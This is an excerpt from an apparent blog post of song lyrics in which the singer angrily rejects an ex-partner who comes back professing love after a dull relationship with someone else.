You say you love me, you love me again but if you love me- where have you been?
You say you need me more than anyone else well go to hell, where have you been?
You showed up at my door today and said my friend why do you push me away
Life with him was just so dull and what we had was something wonderful

You say you love me, you love me again but if you love me- where have you been?
You say you need me more than anyone else well go to hell- where have you been?
I said you wish! I dont need this! what makes you think Id ever want you again?
Yeah right! as if! what makes you think Id ever want you again?

Read more »

Posted in: Lyrics